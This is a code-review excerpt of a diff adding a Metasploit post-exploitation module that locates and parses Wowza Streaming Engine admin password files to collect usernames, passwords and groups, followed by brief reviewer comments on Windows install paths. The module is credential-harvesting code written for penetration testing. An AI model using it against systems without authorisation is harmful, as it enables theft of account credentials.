modules/post/multi/gather/wowza_streaming_engine_creds.rb

```diff
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Gather Wowza Streaming Engine Credentials',
+        'Description' => %q{
+          This module collects Wowza Streaming Engine user credentials.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'URL', 'https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api' ],
+          [ 'URL', 'https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf' ],
+        ],
+        'Author' => ['bcoles'],
+        'Platform' => %w[win linux osx unix],
+        'SessionTypes' => %w[meterpreter powershell shell],
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+  end
+
+  def parse_admin_config(config_path)
+    return [] if config_path.blank?
+
+    print_status("Parsing file #{config_path}")
+
+    begin
+      config_data = read_file(config_path)
+    rescue StandardError => e
+      print_error("Could not read #{config_path} : #{e.message}")
+      return []
+    end
+
+    if config_data.blank?
+      print_warning('Configuration file is empty')
+      return []
+    end
+
+    # Admin password file (format: [username][space][password][space][groups][space][passwordEncoding])
+    # [groups]= "admin" | "admin|advUser" | "basic".
+    # [passwordEncoding]= "cleartext" | "bcrypt" | "digest". If no value is specified, defaults to "cleartext".
+
+    creds = []
+    config_data.each_line do |line|
+      next if line.strip.blank?
+      next if line.starts_with?('#')
+
+      username, password, groups, encoding = line.split(' ')
+      creds << [username, password, groups, encoding]
+    end
+
+    creds
+  end
+
+  # Application is installed to Program Files\\Wowza Media Systems\\Wowza Streaming Engine <version>
+  def config_files_win
+    program_files = get_env('ProgramFiles') || 'C:\\Program Files'
+    program_files_x86 = get_env('ProgramFiles(x86)') || 'C:\\Program Files (x86)'
```

Comment:
meh. hardcoded instead.

> This will break the module since the software seems to be installed in C:\Program Files by default:

Based on documentation, old versions may have installed to `C:\Program Files (x86)`.

Reply:
Awesome, thank you!